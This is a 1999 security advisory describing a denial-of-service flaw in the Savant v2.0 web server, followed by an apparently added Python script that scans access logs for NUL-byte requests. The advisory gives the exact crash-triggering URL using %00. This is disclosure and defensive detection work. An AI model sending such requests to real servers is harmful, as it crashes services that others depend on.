Subject: [w00giving '99 #15] Savant v2.0 web server

Release Date: December 28, 1999

Systems Affected: Savant v2.0 (Win 9X/NT/2K) and possibly other versions

About The Software: Savant provides support for most modern web features and technologies.

THE PROBLEM

UssrLabs found a vulnerability that would allow someone to crash a Savant web server by passing a NUL ('\0') character in the GET (HTML) routine.

Example:

http://SavantServerIP/%00/

The result of the crash, stored in C:\Savant\Logs\general.txt, looks like this:

Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279

Do you do the w00w00?

This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is, don't you?

http://www.w00w00.org/advisories.html

Vendor Status: Contacted

Program URL: http://hera.wku.edu/~lamonml/savant/download.html

SOLUTION

Because the source to Savant isn't public, wait for the vendor to provide a patch.

Greetings: eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://www.ussrback.com
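Until a patch is available, the request pattern above can be looked for in the server's access log. The following is an added example, not part of the original advisory or of Savant: it scans Common Log Format lines like the one quoted from general.txt and flags request targets that contain a NUL byte after percent-decoding. The function names and sample log lines are constructed for illustration, and the double-encoded `%2500` case goes beyond the single URL the advisory shows.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format, as in the general.txt line quoted in the advisory.
# The host field is matched lazily so a multi-word placeholder also parses.
CLF = re.compile(
    r'^(?P<host>.+?) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)\s*$'
)

def decodes_to_nul(target, max_rounds=3):
    """True if the request target holds a NUL byte after up to max_rounds
    of percent-decoding (catches %00 and double-encoded %2500)."""
    data = target.encode("latin-1", "replace")
    for _ in range(max_rounds):
        if b"\x00" in data:
            return True
        decoded = unquote_to_bytes(data)
        if decoded == data:      # nothing left to decode
            break
        data = decoded
    return b"\x00" in data

def scan(lines):
    """Return (host, timestamp, target) for each request carrying a NUL."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m and decodes_to_nul(m["target"]):
            hits.append((m["host"], m["ts"], m["target"]))
    return hits

# Constructed sample log; hosts use documentation address ranges.
SAMPLE = [
    '192.0.2.10 - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.html" 301 279',
    '192.0.2.11 - - [20/Dec/1999:00:11:02 -0300] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [20/Dec/1999:00:12:40 -0300] "GET /docs/%2500/ HTTP/1.0" 404 210',
    '192.0.2.11 - - [20/Dec/1999:00:13:15 -0300] "GET /100%25/notes.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for host, ts, target in scan(SAMPLE):
        print(f"NUL in request target: {host} [{ts}] {target}")
```

The same check can run in a filtering proxy in front of the server, rejecting such requests before they reach it.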